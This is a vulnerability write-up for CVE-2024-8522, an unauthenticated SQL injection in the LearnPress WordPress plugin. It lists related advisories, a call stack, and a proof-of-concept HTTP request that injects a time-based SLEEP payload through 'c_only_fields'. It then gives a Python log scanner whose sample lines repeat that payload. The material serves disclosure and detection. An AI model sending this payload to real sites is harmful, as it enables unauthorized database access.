| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for SQL Injection in Thimpress Learnpress | 19 Sep 2024 07:04 | – | githubexploit |
| The vulnerability of the "c_only_fields" parameter in the REST API endpoint /wp-json/learnpress/v1/courses of the LearnPress plugin for the WordPress content management system allows a hacker to execute arbitrary SQL code. | 18 Feb 2025 00:00 | – | bdu_fstec |
| CVE-2024-8522 | 12 Sep 2024 10:08 | – | circl |
| WordPress plugin LearnPress SQL injection vulnerability | 12 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-8522 | 12 Sep 2024 08:30 | – | cve |
| CVE-2024-8522 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 2024 08:30 | – | cvelist |
| LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection | 11 Apr 2025 00:00 | – | exploitdb |
| WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 17 Oct 2024 18:54 | – | metasploit |
| LearnPress < 4.2.7.1 - SQL Injection | 8 Jun 2026 04:09 | – | nuclei |
| CVE-2024-8522 | 12 Sep 2024 09:15 | – | nvd |

# CVE-2024-8522
LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'
## Stack
```txt
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
class-wp-rest-server.php:439, WP_REST_Server->serve_request()
rest-api.php:420, rest_api_loaded()
class-wp-hook.php:324, WP_Hook->apply_filters()
class-wp-hook.php:348, WP_Hook->do_action()
plugin.php:565, do_action_ref_array()
class-wp.php:418, WP->parse_request()
class-wp.php:813, WP->main()
functions.php:1336, wp()
wp-blog-header.php:16, require()
index.php:17, {main}()
```
## <>
```txt
SELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10
```
## PoC
```http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host: localhost:8077
User-Agent: curl/7.81.0
Cookie: XDEBUG_SESSION=PHPSTORM
Accept: */*
```
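A log check for the request shape in the PoC, added here as an example (not code from the PoC author or from LearnPress): it flags requests to the courses route whose `c_only_fields` value is anything other than comma-separated identifiers. The sample log lines, the benign field names and the `?rest_route=` form of the route are assumptions of the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ROUTE = "/learnpress/v1/courses"  # REST route named in the PoC
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format). The payload is the one
# shown in the PoC; the benign field names are assumed for illustration.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2024:10:00:01 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=ID,post_title HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Sep/2024:10:00:05 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1" 200 2',
    '203.0.113.9 - - [12/Sep/2024:10:00:20 +0000] "GET /?rest_route=/learnpress/v1/courses&c_only_fields=IF(COUNT(*)!%3D-2,(SLEEP(10)),0) HTTP/1.1" 200 2',
    '203.0.113.8 - - [12/Sep/2024:10:01:00 +0000] "GET /wp-json/wp/v2/posts?c_only_fields=IF(1,2,3) HTTP/1.1" 404 0',
]


def suspicious_value(log_line):
    """Return the decoded c_only_fields value if it is not a plain field list."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    # The route can be addressed as /wp-json/<route> or as ?rest_route=<route>.
    pretty = unquote(url.path).rstrip("/").endswith("/wp-json" + ROUTE)
    plain = query.get("rest_route", [""])[0].rstrip("/") == ROUTE
    if not (pretty or plain):
        return None
    for value in query.get("c_only_fields", []):
        fields = [f.strip() for f in value.split(",")]
        # Anything beyond bare identifiers (parentheses, operators, digits
        # alone, quotes) has no place in a field list and is reported.
        if value and not all(IDENT.match(f) for f in fields):
            return value
    return None


def scan(lines):
    """Return (line_number, value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_value(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: c_only_fields={value!r}")
```

The same identifier allowlist, applied server-side before the value reaches the select list of the query shown above, is the shape of check that rejects this input at the source.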